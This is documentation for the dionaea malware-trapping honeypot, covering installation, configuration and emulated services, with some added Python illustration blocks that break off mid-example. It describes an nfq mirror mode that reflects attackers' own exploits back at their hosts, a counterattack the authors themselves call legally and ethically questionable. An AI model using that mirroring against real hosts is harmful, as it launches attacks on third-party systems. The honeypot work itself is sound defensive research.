DIONAEA(1) dionaea DIONAEA(1)


dionaea - dionaea Documentation

Dionaea is meant to be a nepenthes successor, embedding Python as
scripting language, using libemu to detect shellcode, supporting IPv6
and TLS.

WARNING:
The documentation is work in progress.

Content:

How it works
dionaea's intention is to trap malware exploiting vulnerabilities exposed
by services offered to a network; the ultimate goal is gaining a copy of
the malware.

Security
As software is likely to have bugs, bugs in software offering network
services can be exploitable, and dionaea is software offering network
services, it is likely dionaea has exploitable bugs.

Of course we try to avoid it, but if nobody would fail when trying
hard, we would not need software such as dionaea.

So, in order to minimize the impact, dionaea can drop privileges and
chroot.

To be able to run certain actions which require privileges after dionaea
dropped them, dionaea creates a child process at startup and asks the
child process to run actions which require elevated privileges. This
does not guarantee anything, but it should be harder to gain root
access to the system from an unprivileged user in a chroot environment.

Network Connectivity
Given the software's intended use, network I/O is crucial. All network
I/O is done within the main process in a so-called non-blocking manner.
To understand non-blocking, imagine you have many pipes in front of you;
these pipes can send you something, and you can put something into a
pipe. If you want to put something into a pipe while it is crowded,
you'd have to wait; if you want to get something from a pipe and there
is nothing, you'd have to wait too. Doing this pipe game non-blocking
means you won't wait for the pipes to be writable/readable: you'll get
something off the pipes once data arrives, and write once the pipe is
not crowded. If you want to write a large chunk to the pipe, and the
pipe is crowded after a small piece, you note the rest of the chunk you
wanted to write and wait for the pipe to get ready.

DNS resolves are done using libudns, which is a neat non-blocking DNS
resolving library with support for AAAA records and chained CNAMEs. So
much about non-blocking.

dionaea uses libev to get notified once it can act on a socket, read or
write.

dionaea can offer services via TCP/UDP and TLS for IPv4 and IPv6, and
can apply rate limiting and accounting limits per connection to TCP
and TLS connections, if required.

At the time of writing the best choice to install dionaea on a server
is to use Ubuntu 14.04, but below you can find how to install it (from
source) on other distributions/operating systems.

Basic stuff
Download the source code
You can download the source code from the release page or by using the
git command.

git clone https://github.com/DinoTools/dionaea.git
cd dionaea

Arch Linux
Packages for dionaea are available from the Arch User Repository (AUR).
Use a package manager like yaourt that can handle and install packages
from the AUR.

Before you start, install the required build tools.

$ yaourt -S base-devel

After the requirements have been installed successfully you can install
dionaea. This will check out the latest sources from the git repository,
run the build process and install the package.

$ yaourt -S dionaea-git

After the installation has been completed you may want to edit the
config file /etc/dionaea/dionaea.conf. If everything looks fine the
dionaea service can be started by using the following command.

$ sudo systemctl start dionaea

The log files and everything captured can be found in the directory
/var/lib/dionaea/.

Ubuntu 16.04
From Source
Before you start, download the source code of dionaea.

Install the required build dependencies before configuring and building
dionaea ('ttf-liberation' is required by 'util/gnuplotsql.py').

sudo apt-get install \
autoconf \
automake \
build-essential \
check \
cython3 \
libcurl4-openssl-dev \
libemu-dev \
libev-dev \
libglib2.0-dev \
libloudmouth1-dev \
libnetfilter-queue-dev \
libnl-3-dev \
libpcap-dev \
libssl-dev \
libtool \
libudns-dev \
python3 \
python3-dev \
python3-bson \
python3-yaml \
ttf-liberation

After all dependencies have been installed successfully, run autoreconf
to build or rebuild the build scripts.

autoreconf -vi

Run configure to configure the build scripts.

./configure \
--disable-werror \
--prefix=/opt/dionaea \
--with-python=/usr/bin/python3 \
--with-cython-dir=/usr/bin \
--with-ev-include=/usr/include/ \
--with-ev-lib=/usr/lib \
--with-emu-lib=/usr/lib/libemu \
--with-emu-include=/usr/include \
--with-nl-include=/usr/include/libnl3 \
--with-nl-lib=/usr/lib

Now you should be able to run make to build and make install to
install the honeypot.

make
sudo make install

The new honeypot can be found in the directory /opt/dionaea.

Ubuntu 14.04
Package based
Nightly packages are provided in a Personal Package Archive (PPA).
Before you start you should update all packages to get the latest
security updates.

$ sudo apt-get update
$ sudo apt-get dist-upgrade

First of all, install the tools to easily manage PPA resources.

$ sudo apt-get install software-properties-common

After the required tools have been installed you can add the PPA and
update the package cache.

$ sudo add-apt-repository ppa:honeynet/nightly
$ sudo apt-get update

If everything worked without any errors you should be able to install
the dionaea package.

$ sudo apt-get install dionaea

After the installation has been completed you may want to edit the
config file /etc/dionaea/dionaea.conf. If everything looks fine the
dionaea service can be started by using the following command.

$ sudo service dionaea start

The log files can be found in the directory /var/log/dionaea/ and
everything else captured and logged by the honeypot can be found in the
directory /var/lib/dionaea/.

From Source
Before you start, download the source code of dionaea.

Install the required build dependencies before configuring and building
dionaea.

$ sudo apt-get install \
autoconf \
automake \
build-essential \
check \
cython3 \
libcurl4-openssl-dev \
libemu-dev \
libev-dev \
libglib2.0-dev \
libloudmouth1-dev \
libnetfilter-queue-dev \
libnl-dev \
libpcap-dev \
libssl-dev \
libtool \
libudns-dev \
python3 \
python3-dev \
python3-bson \
python3-yaml

After all dependencies have been installed successfully, run autoreconf
to build or rebuild the build scripts.

autoreconf -vi

Run configure to configure the build scripts.

./configure \
--disable-werror \
--prefix=/opt/dionaea \
--with-python=/usr/bin/python3 \
--with-cython-dir=/usr/bin \
--with-ev-include=/usr/include \
--with-ev-lib=/usr/lib \
--with-emu-lib=/usr/lib/libemu \
--with-emu-include=/usr/include \
--with-nl-include=/usr/include/libnl3 \
--with-nl-lib=/usr/lib

Now you should be able to run make to build and make install to
install the honeypot.

make
sudo make install

The new honeypot can be found in the directory /opt/dionaea.

3rd-party packages
The packages below are 3rd party provided, which is appreciated. If
you have compiled a package for your own distribution, just send me the
link or make a pull request.

If you want to change the software, it is really important to
understand how it works, therefore please take the time to understand
how it works. dionaea.cfg is the main configuration file. In the
example below you can see the default configuration.

dionaea.cfg

[dionaea]
download.dir=/var/lib/dionaea/binaries/
modules=curl,python,nfq,emu,pcap
processors=filter_streamdumper,filter_emu

listen.mode=getifaddrs
# listen.addresses=127.0.0.1
# listen.interfaces=eth0,tap0

# Country
# ssl.default.c=GB
# Common Name/domain name
# ssl.default.cn=
# Organization
# ssl.default.o=
# Organizational Unit
# ssl.default.ou=

[logging]
default.filename=/var/log/dionaea/dionaea.log
default.levels=all
default.domains=*

errors.filename=/var/log/dionaea/dionaea-errors.log
errors.levels=warning,error
errors.domains=*

[processor.filter_emu]
name=filter
config.allow.0.protocols=smbd,epmapper,nfqmirrord,mssqld
next=emu

[processor.filter_streamdumper]
name=filter
config.allow.0.types=accept
config.allow.1.types=connect
config.allow.1.protocols=ftpctrl
config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
next=streamdumper

[processor.streamdumper]
name=streamdumper
config.path=/var/lib/dionaea/bistreams/%Y-%m-%d/

[processor.emu]
name=emu
config.limits.files=3
#512 * 1024
config.limits.filesize=524288
config.limits.sockets=3
config.limits.sustain=120
config.limits.idle=30
config.limits.listen=30
config.limits.cpu=120
#// 1024 * 1024 * 1024
config.limits.steps=1073741824

[module.nfq]
queue=2

[module.nl]
# set to yes in case you are interested in the mac address of the remote (only works for lan)
lookup_ethernet_addr=no

[module.python]
imports=dionaea.log,dionaea.services,dionaea.ihandlers
sys_paths=default
service_configs=/etc/dionaea/services-enabled/*.yaml
ihandler_configs=/etc/dionaea/ihandlers-enabled/*.yaml

[module.pcap]
any.interface=any

dionaea
download.dir
Global download directory used by some ihandlers.

listen.mode:
There are basically three modes how dionaea can bind the services to
IP addresses.

• getifaddrs - auto
This will get a list of all IP addresses of all available
interfaces and bind the services to each IP. It is also
possible to specify a list of interfaces to use by using
the listen.interfaces parameter.

• manual - your decision
In this mode you have to specify an additional parameter,
listen.addresses. This is a comma separated list of IP
addresses dionaea should bind the services to.

• nl - will require a list of interfaces
You have to specify a comma separated list of interface
names with the listen.interfaces parameter. If an IP
address is added to an interface or removed from an
interface, dionaea will launch or stop all services for this IP.

modules
Comma separated list of modules.

processors
Comma separated list of processors.

ssl.default.c
Two letter id of the Country.

ssl.default.cn
The Common Name/domain name of the generated SSL/TLS certificate.

ssl.default.o
The Organization name.

ssl.default.ou
The name of the Organizational Unit.

Logging
dionaea has a general application log. These logs are meant to be used
for debugging and to track errors. It is not recommended to analyse
these files to track attacks.

filename
The filename of the logfile.

levels
Only log messages that match the specified log level get logged to
the logfile.

Available log levels:

• debug

• info

• warning

• error

• critical

• all = Special log level including all log levels

Examples:

Log only messages with level warning and error

errors.levels=warning,error

Log all log messages but exclude messages with log level debug

errors.levels=all,-debug

domain
Only log messages in a specified domain.

Modules
Only modules specified by the modules value in the dionaea section are
loaded during start up.

Every module might have its own config section with additional config
parameters. The section name consists of the prefix module and the
module name separated by a dot (.).

See the module/index documentation to find more information on how to
configure the modules.

Processors
The specified processors will be used as an entry point in the
processing pipeline. In most cases the initial processor will be a
filter processor <processor/filter>. The next processor in the pipeline
is specified by the next parameter.

See the processor/index documentation to find more information on how
to configure the processors.

The software has some flags you can provide at startup; the -h flag
shows the help, the -H flag includes the default values.

$ /opt/dionaea/bin/dionaea -H
-c, --config=FILE use FILE as configuration file
Default value/behaviour: /opt/dionaea/etc/dionaea/dionaea.cfg
-D, --daemonize run as daemon
-g, --group=GROUP switch to GROUP after startup (use with -u)
Default value/behaviour: keep current group
-G, --garbage=[collect|debug] garbage collect, usefull to debug memory leaks,
does NOT work with valgrind
-h, --help display help
-H, --large-help display help with default values
-l, --log-levels=WHAT which levels to log, valid values
all, debug, info, message, warning, critical, error
combine using ',', exclude with - prefix
-L, --log-domains=WHAT which domains use * and ? wildcards, combine using ',',
exclude using -
-u, --user=USER switch to USER after startup
Default value/behaviour: keep current user
-p, --pid-file=FILE write pid to file
-r, --chroot=DIR chroot to DIR after startup
Default value/behaviour: don't chroot
-V, --version show version
-w, --workingdir=DIR set the process' working dir to DIR
Default value/behaviour: /opt/dionaea

examples:
# dionaea -l all,-debug -L '*'
# dionaea -l all,-debug -L 'con*,py*'
# dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/var/run/dionaea.pid
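The level and domain selection syntax shared by the [logging] section (levels such as "all,-debug") and the -l/-L flags above (domain patterns such as 'con*,py*'), as an added Python example that is not dionaea's own code. It assumes that a "-" prefix on a domain pattern excludes matches of that pattern, and that items are order-independent; the sample records are constructed.

```python
import fnmatch

# Level names as listed by "dionaea -H" above.
ALL_LEVELS = ("debug", "info", "message", "warning", "critical", "error")


def parse_levels(spec):
    """Expand a level spec such as "all,-debug" or "warning,error" into
    the set of levels that get logged. "-name" removes a level, "all"
    enables every level."""
    enabled = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        if item.startswith("-"):
            name = item[1:]
            enabled -= set(ALL_LEVELS) if name == "all" else {name}
        elif item == "all":
            enabled |= set(ALL_LEVELS)
        elif item in ALL_LEVELS:
            enabled.add(item)
        else:
            raise ValueError("unknown log level: %s" % item)
    return enabled


def parse_domains(spec):
    """Split a domain spec such as "con*,py*,-pycon" into include and
    exclude shell-style patterns (* and ? wildcards)."""
    include, exclude = [], []
    for item in spec.split(","):
        item = item.strip()
        if not item:
            continue
        (exclude if item.startswith("-") else include).append(item.lstrip("-"))
    return include, exclude


class LogFilter:
    def __init__(self, levels="all", domains="*"):
        self.levels = parse_levels(levels)
        self.include, self.exclude = parse_domains(domains)

    def accepts(self, level, domain):
        if level not in self.levels:
            return False
        if any(fnmatch.fnmatchcase(domain, p) for p in self.exclude):
            return False
        return any(fnmatch.fnmatchcase(domain, p) for p in self.include)


# Constructed sample records (level, domain, message); not real dionaea output.
SAMPLE_RECORDS = [
    ("debug", "connection", "fd 7 readable"),
    ("info", "connection", "accepted 198.51.100.7:51234"),
    ("warning", "python", "service sip: unhandled method"),
    ("error", "smb", "parse error"),
]


def filter_records(records, levels, domains):
    """Return the records a logger configured with (levels, domains) keeps."""
    f = LogFilter(levels, domains)
    return [r for r in records if f.accepts(r[0], r[1])]


if __name__ == "__main__":
    for rec in filter_records(SAMPLE_RECORDS, "all,-debug", "con*,py*"):
        print(rec)
```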

A list of applications and tools to collect information exported by
dionaea.

DTAG Community Honeypot Project
The DTAG Community Honeypot Project was started in 2010 by a small
group of enthusiasts at Deutsche Telekom. They maintain T-Pot, a
Multi-Honeypot Platform. It is based on well established honeypots
including dionaea.

• Website: DTAG Community Honeypot Project

• Status: active

DionaeaFR
DionaeaFR is a web frontend to display attack information. It uses the
SQLite database provided by the log_sqlite ihandler.

• Website: DionaeaFR

• Status: unmaintained since 2014

DIY with log_json
You can use the log_json incident handler in combination with an ELK
stack to collect, aggregate and visualize attack information.

• Website: ELK stack

• Status: active

Modern Honey Network (mhn)
A tool to deploy honeypots, collect attack information and display
aggregated statistics.

• Website: Modern Honey Network

• Status: active, but deploys a pre-0.2 (2014) version of dionaea by
default.

The subsection's name is the name of the module dionaea will try to
load. Most modules have rather simple names: the pcap module will
use libpcap, the curl module libcurl, the emu module libemu … The
python module is special, as the python module can load Python scripts
which offer services, and each service can have its own options.

List of available modules

curl
The curl module is used to transfer files from and to servers; it is
used to download files via HTTP as well as to submit files to 3rd
parties.

emu
The emu module is used to detect, profile and, if required, execute
shellcode.

pcap
The pcap module uses the libpcap library to detect rejected connection
attempts, so even if we do not accept a connection, we can use the
information that somebody wanted to connect there.

python
The python module allows using the Python interpreter in dionaea, and
allows controlling some scripts dionaea uses.

Network services speak a certain language; this language is called a
protocol. When we started deploying honeypots, you could trap worms just
by opening a single port and waiting for them to connect and send you a
URL where you could download a copy of the worm. The service getting
attacked was the backdoor of the bagle mailworm, and it did not require
any interaction. Later on, the exploitation of real services got more
complex, and you had to reply something to the worm to fool it.
Nowadays worms use the API to access services before sending their
payload. To allow easy adjustments to the protocol, dionaea implements
the protocols in Python. There is a glue between the network layer,
which is done in the C programming language, and the embedded Python
scripting language, which allows using the non-blocking connections in
Python. This has some benefits: for example we can use non-blocking TLS
connections in Python, and we even get rate limiting on them (if
required), where Python's own I/O does not offer such things. On the
other hand, it is much more comfortable to implement protocols in
Python than doing the same in C.

List of available services

Black hole
The black hole module can be used to bind a service to a port. The
service does not respond to any submitted data, but the bistreams can
be used to create new modules.

Example config
services/blackhole.yaml

- name: blackhole
  config:
    services:
      # Telnet
      - port: 23
        protocol: tcp

      # DNS
      - port: 53
        protocol: udp
      - port: 53
        protocol: tcp

      # NTP
      - port: 123
        protocol: udp


EPMAP
Example config
services/epmap.yaml

- name: epmap


FTP
Dionaea provides a basic FTP server on port 21; it can create
directories and upload and download files. From my own experience there
are very few automated attacks on FTP services and I'm yet to see
something interesting happening on port 21.

Example config
services/ftp.yaml

- name: ftp
  config:
    root: /var/lib/dionaea/roots/ftp
    response_messages:
      welcome_msg: 220 DiskStation FTP server ready.


HTTP
Dionaea supports HTTP on port 80 as well as HTTPS, but there is no code
making use of the data gathered on these ports. For HTTPS, the
self-signed SSL certificate is created at startup.

Configure
Example configuration:

- name: http
  config:
    root: "var/dionaea/wwwroot"

default_headers
Default header fields are sent if none of the other header patterns
match.

global_headers
Global header fields are added to all response headers.

headers
List of header fields to be used in the response header. Only
applied if filename_pattern, status_code and methods match. The first
match in the list is used.

max_request_size
Maximum size in kbytes of the request. 32768 = 32MB

root
The root directory to serve files from.

Example config
services/http.yaml

- name: http
  config:
    root: "/var/lib/dionaea/roots/www"
    ports:
      - 80
    ssl_ports:
      - 443
    max_request_size: 32768 # maximum size in kbytes of the request (32MB)
    global_headers:
      - ["Server", "nginx"]
    headers:
      - filename_pattern: ".*\\.php"
        headers:
          - ["Content-Type", "text/html; charset=utf-8"]
          - ["Content-Length", "{content_length}"]
          - ["Connection", "{connection}"]
          - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
    # soap_enabled: false
    template:
      # set to true to enable template processing
      # this feature requires jinja2 template engine http://jinja.pocoo.org/
      enabled: false
      file_extension: .j2
      path: "/var/lib/dionaea/share/python/http/template/nginx"
      templates:
        autoindex:
          filename: autoindex.html.j2
        error_pages:
          - filename: error.html.j2
          # - filename: error/{code}.html.j2
      # used to specify additional template values
      values:
        # full_name: nginx/1.1

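How the header keys described above combine on the config just shown, as an added Python example that is not the http service's own code: the first entry of headers whose criteria all match wins, default_headers is the fallback, and global_headers is always appended. That status_code and methods are lists, that filename_pattern is matched against the whole request path, and that {content_length} and {connection} are filled from per-response values are assumptions; the default_headers entry and the 404 rule are constructed additions to the page's config.

```python
import re


class _KeepMissing(dict):
    """Leave unknown {placeholders} untouched instead of raising KeyError."""
    def __missing__(self, key):
        return "{" + key + "}"


# Constructed from the services/http.yaml example above; the default_headers
# entry and the 404 rule are added here for illustration.
HTTP_CONFIG = {
    "global_headers": [("Server", "nginx")],
    "default_headers": [("Content-Type", "text/html")],
    "headers": [
        {
            "filename_pattern": r".*\.php",
            "headers": [
                ("Content-Type", "text/html; charset=utf-8"),
                ("Content-Length", "{content_length}"),
                ("Connection", "{connection}"),
                ("X-Powered-By", "PHP/5.5.9-1ubuntu4.5"),
            ],
        },
        {
            "status_code": [404],
            "headers": [("Content-Type", "text/html"), ("Connection", "close")],
        },
    ],
}


class HttpHeaderSelector:
    def __init__(self, config):
        self.global_headers = list(config.get("global_headers", []))
        self.default_headers = list(config.get("default_headers", []))
        self.rules = list(config.get("headers", []))

    @staticmethod
    def _matches(rule, filename, status_code, method):
        # every criterion present in the rule has to match
        pattern = rule.get("filename_pattern")
        if pattern is not None and re.fullmatch(pattern, filename) is None:
            return False
        codes = rule.get("status_code")
        if codes is not None and status_code not in codes:
            return False
        methods = rule.get("methods")
        if methods is not None and method not in methods:
            return False
        return True

    def select(self, filename, status_code=200, method="GET", values=None):
        """Return the (name, value) header fields for one response."""
        values = _KeepMissing(values or {})
        chosen = self.default_headers
        for rule in self.rules:               # first match in the list wins
            if self._matches(rule, filename, status_code, method):
                chosen = list(rule["headers"])
                break
        return [(name, str(value).format_map(values))
                for name, value in chosen + self.global_headers]


if __name__ == "__main__":
    sel = HttpHeaderSelector(HTTP_CONFIG)
    for field in sel.select("/index.php", values={"content_length": 512,
                                                  "connection": "close"}):
        print("%s: %s" % field)
```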

Additional examples
Set the Server response field.

- name: http
  config:
    global_headers:
      - ["Server", "nginx"]

Define headers to use if the filename matches a pattern.

- name: http
  config:
    headers:
      - filename_pattern: ".*\\.php"
        headers:
          - ["Content-Type", "text/html; charset=utf-8"]
          - ["Content-Length", "{content_length}"]
          - ["Connection", "{connection}"]
          - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]

Memcache
Dionaea can emulate a very basic memcached server.

Configure
Example config
services/memcache.yaml

- name: memcache


Mirror
Example config
services/mirror.yaml

- name: mirror


MongoDB
This module adds initial support for emulating a MongoDB server with the
dionaea honeypot. At the moment it is very limited and the
functionality might be improved in one of the next releases.

Requirements
• bson module for Python 3

Example config
services/mongo.yaml

- name: mongo


MQTT
Example config
services/mqtt.yaml

- name: mqtt


MSSQL
This module implements the Tabular Data Stream protocol which is used
by Microsoft SQL Server. It listens on tcp/1433 and allows clients to
log in. It can decode queries run on the database, but as there is no
database, dionaea can't reply, and there is no further action.
Typically we always get the same query:

exec sp_server_info 1
exec sp_server_info 2
exec sp_server_info 500
select 501,NULL,1 where 'a'='A'
select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id
set textsize 2147483647
set arithabort on

Refer to the blog post <http://carnivore.it/2010/09/11/mssql_attacks_examined>
for more information. Patches would be appreciated.

Example config
services/mssql.yaml

- name: mssql


MySQL
This module implements the MySQL wire stream protocol, backed by
sqlite as database. Please refer to 2011-05-15 Extending Dionaea
<http://carnivore.it/2011/05/15/extending_dionaea> for more information.

Example config
services/mysql.yaml

- name: mysql
  config:
    databases:
      information_schema:
        path: ":memory:"
      # example how to extend this
      # just provide a databasename and path to the database
      # the database can be altered by attackers, so ... better use a copy
      # psn:
      #   path: "/path/to/cc_info.sqlite"


nfq
The python nfq script is the counterpart to the nfq module. While the
nfq module interacts with the kernel, the nfq python script takes care
of the required steps to start a new service on the ports. nfq can
intercept incoming TCP connections during the TCP handshake, giving your
honeypot the possibility to provide a service on ports which are not
served by default.

As dionaea can neither predict which protocol will be spoken on unknown
ports, nor implement the protocol by itself, it will connect to the
attacking host on the same port, and use the attacker's server side
protocol implementation to reply to the client requests of the attacker;
therefore dionaea can end up re-exploiting the attacker's machine, just
by sending him the exploit he sent us.

The technique is a brainchild of Tillmann Werner, who used it within
his honeytrap <http://honeytrap.carnivore.it> honeypot. Legal
boundaries to such behaviour may be different in each country, as well
as ethical boundaries for each individual. From a technical point of
view it works, and gives good results. Learning from the best, I decided
to adopt this technique for dionaea. Besides the legal and ethical
issues with this approach, there are some technical things which have
to be mentioned.

port scanning
If your honeypot gets port scanned, it would open a service for each
port scanned; in the worst case you'd end up offering 64k services
per IP scanned. By default you'd run out of fds at about 870 services
offered, and experience weird behaviour. Therefore the impact of port
scanning has to be limited. The KISS approach taken here is a sliding
window of throttle.window seconds size. Each slot in this sliding
window represents a second, and we increment this slot for each
connection we accept. Before we accept a connection, we check if the
sum of all slots is below throttle.limits.total, else we do not create
a new service. If the sum is below the limit, we check if the current
slot is below the slot limit too; if both are given, we create a new
service. If one of the conditions fails, we do not spawn a new service,
and let nfqueue process the packet. There are two ways to process
packets which got throttled:

• NF_ACCEPT (=1), which will let the packet pass the kernel, and as
there is no service listening, the packet gets rejected.

• NF_DROP (=0), which will drop the packet in the kernel; the remote
does not get any answer to his SYN.

I prefer NF_DROP, as port scanners such as nmap tend to limit their
scanning speed once they notice packets get lost.

recursive self-connecting
Assume some shellcode or download instructions make dionaea

• connect itself on an unbound port

• nfq intercepts the attempt

• spawns a service

• accepts the connection #1

• creates a mirror connection for connection #1 by connecting the
remote host (itself) on the same port #2

• accepts connection #2 as connection #3

• creates a mirror connection for connection #3 by connecting the
remote host (itself) on the same port #4

• …

Such a recursive loop has to be avoided for obvious reasons. Therefore
dionaea checks if the remote host connecting to an nfq mirror is a
local address using 'getifaddrs' and drops local connections.
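The throttle window from the port scanning item and the local-address check from the recursive self-connecting item, as an added Python example that is not dionaea's nfq script. NF_ACCEPT=1 and NF_DROP=0 are taken from the text; the window size, the limits and the per-second slot limit are assumed values, and the local address list stands in for what getifaddrs would return.

```python
import ipaddress
import time

NF_DROP = 0     # drop the SYN in the kernel, the remote sees no answer
NF_ACCEPT = 1   # let it pass; nothing listens, so the kernel rejects it


class NfqMirrorGuard:
    """Decides whether a new nfq mirror service may be spawned for an
    incoming SYN: sliding-window throttling plus the self-connect check.
    Defaults are assumptions, not dionaea's configured values."""

    def __init__(self, window=30, limit_total=30, limit_slot=5,
                 local_addresses=(), throttle_verdict=NF_DROP):
        self.window = window                # throttle.window, in seconds
        self.limit_total = limit_total      # throttle.limits.total
        self.limit_slot = limit_slot        # per-second slot limit
        self.slots = [0] * window           # one accept counter per second
        self.last_second = None
        # stands in for the getifaddrs() result used to detect self-connects
        self.local = {ipaddress.ip_address(a) for a in local_addresses}
        self.throttle_verdict = throttle_verdict

    def _advance(self, now):
        """Zero every slot between the last seen second and now, so stale
        counts fall out of the window."""
        sec = int(now)
        if self.last_second is None:
            self.last_second = sec
            return
        elapsed = sec - self.last_second
        if elapsed <= 0:
            return
        for i in range(1, min(elapsed, self.window) + 1):
            self.slots[(self.last_second + i) % self.window] = 0
        self.last_second = sec

    def verdict(self, remote_ip, now=None):
        """Return ("spawn", None) when a service may be created, otherwise
        the reason and the netfilter verdict to hand back to nfqueue."""
        now = time.time() if now is None else now
        if ipaddress.ip_address(remote_ip) in self.local:
            return ("local", NF_DROP)       # would become a recursive loop
        self._advance(now)
        slot = int(now) % self.window
        if sum(self.slots) >= self.limit_total:
            return ("throttle", self.throttle_verdict)
        if self.slots[slot] >= self.limit_slot:
            return ("throttle", self.throttle_verdict)
        self.slots[slot] += 1
        return ("spawn", None)


if __name__ == "__main__":
    # constructed scan: many SYNs from one host within a few seconds
    guard = NfqMirrorGuard(window=10, limit_total=6, limit_slot=3,
                           local_addresses=["192.0.2.10"])
    for t in (1000.0, 1000.2, 1000.4, 1000.6, 1001.0, 1004.0, 1020.0):
        print(t, guard.verdict("198.51.100.7", now=t))
    print(guard.verdict("192.0.2.10", now=1020.5))
```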

So much about the known problems and workarounds …

If you read that far, you want to use it despite the
technical/legal/ethical problems. So … You'll need iptables, and you'll
have to tell iptables to enqueue packets which would establish a new
connection. I recommend something like this:

iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5

Explanation:

1. ACCEPT all connections to existing services

2. enqueue all other packets to the NFQUEUE

If you have dionaea running on your NAT router, I recommend something
like:

iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE

Explanation:

1. ACCEPT all connections to existing services in mangle::PREROUTING

2. MARK all other packets

3. if we see these marked packets on INPUT, queue them

Using something like:

iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5

will enqueue /all/ SYN packets to the NFQUEUE; once you stop dionaea
you will not even be able to connect to your ssh daemon.

Even if you add an exemption for ssh like:

iptables -A INPUT -i eth0 -p tcp --syn -m state --state NEW --destination-port ! 22 -j NFQUEUE

dionaea will try to create a new service for /every/ incoming
connection, even if there is a service running already. As it is easy
to avoid this, I recommend sticking with the recommendation. Besides the
already mentioned throttle settings, there are various timeouts for the
nfq mirror service in the config. You can control how long the service
will wait for new connections (/timeouts.server.listen/), and how long
the mirror connection will be idle (/timeouts.client.idle/) and sustain
(/timeouts.client.sustain/).

PPTP
Example config
services/pptp.yaml

- name: pptp
  config:
    # Cisco PIX
    # firmware_revision: 4608
    # hostname:
    # vendor_name: Cisco Systems

    # DrayTek
    # firmware_revision: 1
    # hostname: Vigor
    # vendor_name: DrayTek

    # Linux
    # firmware_revision: 1
    # hostname: local
    # vendor_name: linux

    # Windows
    # firmware_revision: 0
    # hostname:
    # vendor_name: Microsoft

    # MikroTik router
    # firmware_revision: 1
    # hostname: MikroTik
    # vendor_name: MikroTik


SIP (VoIP)
This is a VoIP module for the honeypot dionaea. The VoIP protocol used
is SIP since it is the de facto standard for VoIP today. In contrast to
some other VoIP honeypots, this module doesn't connect to an external
VoIP registrar/server. It simply waits for incoming SIP messages (e.g.
OPTIONS or even INVITE), logs all data as honeypot incidents and/or
binary data dumps (RTP traffic), and reacts accordingly, for instance by
creating a SIP session including an RTP audio channel. As sophisticated
exploits within the SIP payload are not very common yet, the honeypot
module doesn't pass any code to dionaea's code emulation engine. This
will be implemented if we spot such malicious messages. The main
features of the VoIP module are:

• Support for most SIP requests (OPTIONS, INVITE, ACK, CANCEL, BYE)

• Support for multiple SIP sessions and RTP audio streams

• Record all RTP data (optional)

• Set custom SIP username and secret (password)

• Set custom useragent to mimic different phone models

• Uses dionaea's incident system to log to SQL database

Personalities
A personality defines how to handle a request. At least the 'default'
personality MUST exist. The following options are available per
personality.

serve
A list of IP addresses to use this personality for.

handle
List of SIP methods to handle.

SIP Users
You can easily add, change or remove users by editing the SQLite file
specified by the 'users = ""' parameter in the config file. All users
are specified in the users table.

username
Specifies the name of the user. This value is treated as a regular
expression. See Python: Regular Expressions
<http://docs.python.org/py3k/library/re.html> for more information.

password
The password.

personality
The user is only available in the personality specified by this
value. You can define a personality in the config file.

pickup_delay_min
This is an integer value. Let the phone ring for at least this
number of seconds.

pickup_delay_max
This is an integer value. Maximum number of seconds to wait before
dionaea picks up the phone.

action
This value isn't in use, yet.

sdp
The name of the SDP to use. See table 'sdp'.

SDP
All SDPs can be defined in the sdp table in the users database.

name
Name of the SDP

sdp
The value to use as SDP

The following values are available in the SDP definition.

{addrtype}
Address type. (IP4 or IP6)

{unicast_address}
RTP address

{audio_port}
Dionaea audio port.

{video_port}
Dionaea video port.

The following control parameters are available in the SDP definition.

[audio_port]…content…[/audio_port]
The content is only available in the output if the audio_port value
is set.

[video_port]…content…[/video_port]
The content is only available in the output if the video_port value
is set.

Example:

v=0
o=- 1304279835 1 IN {addrtype} {unicast_address}
s=SIP Session
c=IN {addrtype} {unicast_address}
t=0 0
[audio_port]
m=audio {audio_port} RTP/AVP 111 0 8 9 101 120
a=sendrecv
a=rtpmap:111 Speex/16000/1
a=fmtp:111 sr=16000,mode=any
a=rtpmap:0 PCMU/8000/1
a=rtpmap:8 PCMA/8000/1
a=rtpmap:9 G722/8000/1
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16,32,36
a=rtpmap:120 NSE/8000
a=fmtp:120 192-193
[/audio_port]
[video_port]
m=video {video_port} RTP/AVP 34 96 97
c=IN {addrtype} {unicast_address}
a=rtpmap:34 H263/90000
a=fmtp:34 QCIF=2
a=rtpmap:96 H263-1998/90000
a=fmtp:96 QCIF=2
a=rtpmap:97 H263-N800/90000
[/video_port]
1065
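The SDP definition above is a small template language: each {name} placeholder is substituted with its value, and a [name]...[/name] control block survives only when that value is set. The following Python is an added illustration of how such a template can be rendered; it is not dionaea's own SIP module code, and the template text, the value names and the render_sdp/media_lines helpers are assumptions made for this example. It refuses to render when a placeholder outside any control block refers to an unset value, so a half-filled SDP never reaches the remote side.

```python
import re

# Constructed template with the same placeholders and control blocks as the
# example above; it is not the project's own default SDP.
SDP_TEMPLATE = """v=0
o=- 1304279835 1 IN {addrtype} {unicast_address}
s=SIP Session
c=IN {addrtype} {unicast_address}
t=0 0
[audio_port]
m=audio {audio_port} RTP/AVP 0 8 101
a=sendrecv
a=rtpmap:0 PCMU/8000/1
a=rtpmap:8 PCMA/8000/1
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16,32,36
[/audio_port]
[video_port]
m=video {video_port} RTP/AVP 34
c=IN {addrtype} {unicast_address}
a=rtpmap:34 H263/90000
[/video_port]
"""

# [name] ... [/name] with an optional newline after each tag, so that dropping
# a block does not leave an empty line behind in the SDP.
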